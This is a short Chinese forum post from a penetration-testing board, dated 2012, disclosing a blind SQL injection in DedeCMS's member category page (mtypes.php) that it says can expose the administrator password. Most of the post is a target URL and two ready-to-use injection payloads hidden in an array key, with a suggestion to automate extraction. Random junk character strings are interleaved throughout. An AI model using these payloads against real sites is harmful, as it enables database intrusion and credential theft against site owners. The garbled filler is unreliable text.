中国网络渗透测试联盟

标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码 [打印本页]
作者: admin    时间: 2012-12-20 08:08
标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
需要magic_quotes_gpc = Off,所以说是鸡肋啊.! F/ Q! r% n7 Z- e1 g; ~+ v

: T. Z. }* j& V9 @
1 C$ E# ~% K6 s& \+ M发生在数组key里的注射漏洞,有点意思.8 w0 _2 I7 f7 q# Q. {9 }4 c% b; A
$ `& U- k+ `% s9 V' t, G9 b) r2 d
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
) x* r0 q6 {* c$ C, i6 _9 ` + T* d8 ^: S( s" q* r5 o
http://www.xxx.com /dede/member/mtypes.php?dopost=save3 D" q3 p! p0 W) z# v( S* {; Z$ g
0 i( P$ K  E( K6 a; U+ g3 c% b& s
exploit:# b9 R" P5 C. p/ W1 s2 U
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r) T! S2 H9 @& l8 s3 [* W
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
" [2 b# g! I4 h$ k" L



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2